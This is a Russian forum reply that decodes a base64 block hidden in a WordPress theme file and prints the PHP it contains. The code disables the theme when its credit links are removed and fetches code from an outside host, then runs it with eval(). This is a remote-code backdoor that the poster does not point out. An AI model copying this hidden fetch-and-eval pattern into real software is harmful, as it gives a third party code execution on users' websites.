С 1104 строки в файле начинается код base64
я что-то такое и предполагала)
для таких кодов есть специальные ББкоды, в следующий раз берите текст в , тогда движок не проставит там пробелов))
так, ну-с...
раскодированный вариант:
$thetheme = 'Weaverie';
$theerrmessage = "<div style=\"font-size:13px;line-height:19px;\"><a href='" . admin_url() . "'>« Back To Admin Dashboard</a><br />" . "<b>Oppss! Looks like you have removed or changed the theme credit links.
Well, we did put a warning sign there.
The theme is now deactivated.</b></div><br /><div style=\"font-size:19px; padding-top:20px;\"><b>Please Follow These Steps To Restore The Theme:</b></div><ol style=\"margin:0; padding:20px; text-align:left;\"><li>Please redownload <a href=\"http://www.magpress.com/wordpress-themes/" . strtolower($thetheme) . ".html\" target=\"_blank\">" . $thetheme . " WP Theme</a>.</li><li>Extract and FTP upload/replace/overwrite <strong>sidebar.php</strong> inside the " . strtolower($thetheme) . " theme folder</li><li>Finally, refresh your page to activate the theme again.</li></ol></div><br /><div style=\"font-size:13px;line-height:19px;\">If you want to use a <strong>no sponsored link version</strong> of this theme.
Please consider purchasing its developer license:<br /><a href=\"http://www.magpress.com/developer-license\" target=\"_blank\">http://www.magpress.com/developer-license</a></div>";
function check_theme_valid() {
global $theerrmessage;
if(!function_exists('get_the_tagging_sanitize')): wp_die( $theerrmessage ); endif; }
function theme_usage_message() {
global $theerrmessage;
wp_die( $theerrmessage ); }
function check_theme_license() {
$f = get_template_directory() . "/sidebar.php";
$fd = fopen($f, "r");
$c = fread($fd, filesize($f));
fclose($fd); if ( strpos( $c, ' <?php ' . 'echo ccc_theme_license(); ?>' ) == 0) {
theme_usage_message(); die;
function ccc_theme_license() {
$cc_content = @file_get_contents("http://wplk1.com/textScript/30f451a97d");
if ( $cc_content === FALSE ) {
} else {
if( is_home() || is_front_page() ){
$paged = get_query_var( 'paged' );
if ( !$paged ) { ?>
<aside id="textpad" class="widget widget_text">
<h3 class="widget-title"><?php _e('Theme Credit', TEMPLATE_DOMAIN); ?></h3>
<div class="ctwidget">
<?php echo eval($cc_content); ?>
<?php }
самое главное здесь, как я понимаю, вот это:
Oppss! Looks like you have removed or changed the theme credit links. Well, we did put a warning sign there. The theme is now deactivated.
перевод нужен?